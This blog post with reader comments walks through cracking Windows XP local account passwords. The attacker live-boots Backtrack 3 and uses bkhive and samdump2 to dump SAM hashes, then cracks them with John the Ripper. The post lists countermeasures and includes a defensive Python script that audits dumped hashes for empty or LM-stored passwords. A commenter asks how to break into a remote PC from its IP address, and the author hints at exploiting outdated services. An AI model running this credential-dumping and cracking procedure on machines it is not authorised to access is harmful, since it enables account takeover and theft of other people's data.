Cracking WindowsXP local user password with Backtrack 3

Password cracking became easy once the Backtrack Linux distro came along, and it gets easier still when the password you want to crack is one saved on Windows XP.

Windows XP stores its usernames and password information in a file named SAM under %SystemDrive%\Windows\system32\config\. The SAM holds the passwords as LM hashes (obfuscated with the SYSKEY boot key, which is why the SYSTEM hive is needed in the steps below), and LM hashes are vulnerable to rainbow-table and brute-force attacks.

Insert the Backtrack 3 CD/USB and boot the machine from it (live boot).

When you reach the Backtrack 3 desktop, open a console and type:

df *to view the hard-disk partition layout; the Windows system partition is usually found at /mnt/hda1, which is the mount point used in this example
cd /mnt/hda1/WINDOWS/system32/config/
bkhive system key *extracts the SYSKEY boot key from the SYSTEM hive into the file "key" (see the bkhive manual)
samdump2 SAM key > ~/Desktop/password.txt *~/Desktop/password.txt is the example location for storing the dumped password hash file
cat ~/Desktop/password.txt

You will see the usernames and the hash values from the SAM file.

There are multiple ways to crack the hashes (John the Ripper, rainbow tables, LCP). Here we use John the Ripper as the example.

john ~/Desktop/password.txt --users=Administrator (Administrator is the example user name)

In the example output, the user Owner has the password “abc123” and the Administrator account has no password.

Countermeasures for the attack:

  • Set a boot-up password in the BIOS to prevent unauthorized live boots from CD/USB storage media.
  • Secure physical access to the machine. The cardinal rule that physical access equals total access exists for a reason.
  • Use strong passwords. A strong password combines alphanumeric characters (0-9, a-z, A-Z) and symbols (!@#$%^&*()_+) and is at least 8 characters long; cracking it takes much longer, and may be infeasible, e.g. the password “%a^&b*&e^$5*45*&^%<%” against a medium-size rainbow table.
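A defender can use the same dump format shown above to audit which local accounts are exposed before enforcing a password policy. The following is an added example, not code from this post: it parses samdump2/pwdump lines and flags empty passwords and accounts that still store an LM hash (short enough to be rainbow-tabled). The two empty-password hash constants are real; the other hash values and the account names in the sample are constructed.

```python
import re

# Well-known hashes of the empty password (real constants, not page-specific).
EMPTY_LM_HALF = "aad3b435b51404ee"   # DES of "KGS!@#$%" under an all-zero key
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4 of the empty UTF-16LE string

# pwdump/samdump2 line layout: user:RID:LM_hash:NT_hash:::
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

def parse_pwdump(text):
    """Yield (user, rid, lm, nt) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1), int(m.group(2)), m.group(3).lower(), m.group(4).lower()

def audit_account(lm, nt):
    """Return the list of weaknesses visible from one account's hashes."""
    findings = []
    if nt == EMPTY_NT:
        findings.append("empty password")
    if lm != EMPTY_LM:
        # Any LM hash at all: password is <= 14 chars and LM storage was on,
        # so its uppercased 7-char halves are within rainbow-table reach.
        findings.append("LM hash stored (password <= 14 chars)")
        if lm[16:] == EMPTY_LM_HALF:
            # Second DES block keyed by padding only: password is <= 7 chars.
            findings.append("second LM half empty (password <= 7 chars)")
    # Empty LM with a non-empty NT hash means LM storage was disabled
    # (NoLMHash) or the password is 15+ chars: nothing to flag.
    return findings

def audit_dump(text):
    """Map each user in the dump to its findings (empty list = nothing weak)."""
    return {user: audit_account(lm, nt) for user, _rid, lm, nt in parse_pwdump(text)}

# Constructed sample mirroring the post: Administrator with no password, Owner
# with a short password. The non-empty hash halves are made-up hex values.
SAMPLE_DUMP = (
    f"Administrator:500:{EMPTY_LM}:{EMPTY_NT}:::\n"
    f"Owner:1003:0123456789abcdef{EMPTY_LM_HALF}:fedcba9876543210fedcba9876543210:::\n"
    f"helpdesk:1004:{EMPTY_LM}:00112233445566778899aabbccddeeff:::\n"
)

if __name__ == "__main__":
    for user, findings in audit_dump(SAMPLE_DUMP).items():
        print(f"{user}: {', '.join(findings) or 'nothing flagged'}")
```

The helpdesk line shows the case a 15+ character password (or the NoLMHash policy) produces: an empty LM field next to a real NT hash, which is what the strong-password countermeasure aims for.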


12 Responses to “Cracking WindowsXP local user password with Backtrack 3”

  1. Bryan
    November 5, 2008 at 7:31 am

    I couldn’t help but notice the example picture and the username said …..that wouldn’t happen to be one of the University of Iowa’s computers now would it? hahaha

  2. albertsiow
    November 5, 2008 at 10:03 am

    If the computer is a member of Active Directory, then this won’t work!
    For prevention, please refer to the suggestions above…
    For example, if you don’t implement a hard-disk encryption solution, the BIOS can be configured by anyone to boot a live OS, and all PCs are standalone workstations, it will work!

  3. Tom
    December 7, 2008 at 7:48 pm

    This is a good article and the countermeasures are good advice, but the article fails to mention one thing. By using a 15 character or longer password, the hashes are not stored as vulnerable hashes. If you use a fifteen character or longer password, it doesn’t matter what charset you use ([a-z] should be sufficient), it will take forever to crack.

    • albertsiow
      December 9, 2008 at 2:40 am

      Thanks for your comment, Tom.
      I think with the help of rainbow tables, the NTLM hash of a password of 15 characters or more is still vulnerable, depending on the password coverage range of the table. Please prove me wrong. Thanks!

  4. Oktain
    April 7, 2009 at 1:18 am

    Old topic I know.

    But I have to correct Tom. Hashes are cracked just by brute force. A 15+ char password means nothing with a weak char set. Just FYI.

    • Reki
      June 21, 2010 at 4:07 am

      I need to correct Oktain. Using a rainbow table is nothing like brute forcing. Rainbow tables list all of the combinations and their hashes, making cracking passwords a snap.

  5. Oktain
    April 7, 2009 at 1:19 am

    Typo in my previous comment: “are” should be “aren’t”.

  6. May 31, 2010 at 8:14 am

    I am Elijah, I am from South Africa, I am doing my first year in IT. I like everything about programming, especially about cracking and hacking, and I find this web site very useful to me and also relevant. Thanks

  7. aqil
    August 10, 2010 at 9:52 am

    Help me, I want to learn IT.

  8. April 20, 2011 at 2:36 pm

    Hi AlbertSiow,

    I am new to Backtrack and currently using BT4. Just for an educational purpose 😉
    How do you get (hack) into another PC that runs Win XP in Japan (for example) when you only have their IP address and you are in China? What are the tools needed & how?

    N33D 4 C|u3.

    • albertsiow
      April 20, 2011 at 5:39 pm

      You can’t! Physical access is needed. We can still gain the credentials through an IP address, but more work is needed, most probably a loophole in an outdated service (privilege escalation and so on…)
